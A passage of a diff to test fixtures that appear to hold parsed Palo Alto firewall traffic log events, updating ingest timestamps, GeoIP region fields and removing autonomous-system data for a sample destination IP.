"Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -960,7 +925,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381674200Z", + "ingested": "2021-12-14T14:50:18.748395918Z", "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,26376,1,55072,53,0,0,0x200000,udp,allow,74,74,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", @@ -985,26 +950,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 806, - "ip": "175.16.199.1", - "packets": 4 + "packets": 4, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -1100,7 +1060,7 @@ }, "event": { "duration": 1000000000, - "ingested": "2021-12-09T13:43:22.381679500Z", + "ingested": "2021-12-14T14:50:18.748396262Z", "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25118,1,59207,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", 
@@ -1125,26 +1085,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 806, - "ip": "175.16.199.1", - "packets": 4 + "packets": 4, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -1240,7 +1195,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381684800Z", + "ingested": "2021-12-14T14:50:18.748396602Z", "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26146,1,59209,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:28,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", @@ -1265,26 +1220,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 806, - "ip": "175.16.199.1", - "packets": 4 + "packets": 4, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -1380,7 +1330,7 @@ }, "event": { "duration": 1000000000, - "ingested": "2021-12-09T13:43:22.381690100Z", + "ingested": "2021-12-14T14:50:18.748397050Z", "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25272,1,59208,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", @@ -1405,26 +1355,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -1520,7 +1465,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381695400Z", + "ingested": "2021-12-14T14:50:18.748397555Z", "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,24069,1,59318,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", 
@@ -1545,26 +1490,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -1660,7 +1600,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381701200Z", + "ingested": "2021-12-14T14:50:18.748398163Z", "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25848,1,59317,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", @@ -1685,26 +1625,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -1800,7 +1735,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381706400Z", + "ingested": "2021-12-14T14:50:18.748398520Z", "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25179,1,59316,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", @@ -1825,26 +1760,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -1940,7 +1870,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381711800Z", + "ingested": "2021-12-14T14:50:18.748398916Z", "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25112,1,59315,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", 
@@ -1965,26 +1895,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 806, - "ip": "175.16.199.1", - "packets": 4 + "packets": 4, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -2080,7 +2005,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381717100Z", + "ingested": "2021-12-14T14:50:18.748399275Z", "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26161,1,59206,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", @@ -2105,26 +2030,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 806, - "ip": "175.16.199.1", - "packets": 4 + "packets": 4, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -2220,7 +2140,7 @@ }, "event": { "duration": 1000000000, - "ingested": "2021-12-09T13:43:22.381722300Z", + "ingested": "2021-12-14T14:50:18.748399609Z", "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26000,1,59205,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", @@ -2245,26 +2165,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 551, - "ip": "175.16.199.1", - "packets": 3 + "packets": 3, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -2360,7 +2275,7 @@ }, "event": { "duration": 512000000000, - "ingested": "2021-12-09T13:43:22.381727900Z", + "ingested": "2021-12-14T14:50:18.748400096Z", "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,65184,1,56858,80,0,0,0x200000,tcp,allow,1910,1359,551,21,2012/04/10 04:29:54,512,malware-sites,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,18,3", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", 
@@ -2385,26 +2300,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -2500,7 +2410,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381733300Z", + "ingested": "2021-12-14T14:50:18.748400459Z", "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26522,1,59314,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", @@ -2525,26 +2435,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -2640,7 +2545,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381738800Z", + "ingested": "2021-12-14T14:50:18.748400807Z", "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26067,1,59313,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", @@ -2665,26 +2570,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -2780,7 +2680,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381744Z", + "ingested": "2021-12-14T14:50:18.748401151Z", "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26573,1,52139,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", 
@@ -2805,26 +2705,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -2920,7 +2815,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381749300Z", + "ingested": "2021-12-14T14:50:18.748401490Z", "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26894,1,60592,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", @@ -2945,26 +2840,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -3060,7 +2950,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381754600Z", + "ingested": "2021-12-14T14:50:18.748401832Z", "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,25149,1,59309,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", @@ -3085,26 +2975,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 98, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -3200,7 +3085,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381760Z", + "ingested": "2021-12-14T14:50:18.748402174Z", "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25258,1,57322,53,0,0,0x200000,udp,allow,164,66,98,2,2012/04/10 04:39:26,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", 
@@ -3225,26 +3110,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 806, - "ip": "175.16.199.1", - "packets": 4 + "packets": 4, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -3340,7 +3220,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381765600Z", + "ingested": "2021-12-14T14:50:18.748402657Z", "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25025,1,59204,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", @@ -3365,26 +3245,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 806, - "ip": "175.16.199.1", - "packets": 4 + "packets": 4, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -3480,7 +3355,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381768800Z", + "ingested": "2021-12-14T14:50:18.748403002Z", "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26138,1,59203,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", @@ -3505,26 +3380,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -3620,7 +3490,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381773Z", + "ingested": "2021-12-14T14:50:18.748403355Z", "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,27175,1,59305,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", 
@@ -3645,26 +3515,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -3760,7 +3625,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381778Z", + "ingested": "2021-12-14T14:50:18.748403691Z", "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26261,1,64005,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", @@ -3785,26 +3650,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -3900,7 +3760,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381782600Z", + "ingested": "2021-12-14T14:50:18.748404049Z", "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25022,1,58768,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", @@ -3925,26 +3785,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 13069, "bytes": 504, - "ip": "175.16.199.1", - "packets": 8 + "packets": 8, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -4040,7 +3895,7 @@ }, "event": { "duration": 125000000000, - "ingested": "2021-12-09T13:43:22.381786200Z", + "ingested": "2021-12-14T14:50:18.748404389Z", "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,skype,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,24027,1,47752,13069,0,0,0x200000,udp,allow,1008,504,504,16,2012/04/10 04:37:50,125,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,8,8", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", 
